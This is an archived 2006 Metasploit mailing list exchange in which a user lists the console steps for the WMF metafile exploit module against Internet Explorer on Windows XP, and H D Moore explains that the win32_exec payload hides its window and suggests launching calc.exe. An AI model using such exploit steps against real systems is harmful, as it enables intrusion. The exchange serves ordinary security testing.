Metasploit mailing list archives

unable to reproduce WMF exploit


From: hdm at metasploit.com (H D Moore)
Date: Tue, 10 Jan 2006 08:36:06 -0600

The win32_exec payload runs with the window hidden by default, try this:
- set CMD "cmd.exe /c calc.exe"

-HD

On Tuesday 10 January 2006 06:02, /dev/null wrote:
Sorry, for off-topic...

Seem that everybody was able to reproduce the WMF exploit except me :)

Here are the steps I performed:

- use ie_xp_pfv_metafile
- set PAYLOAD win32_exec
- set CMD cmd.exe
- exploit



Current thread: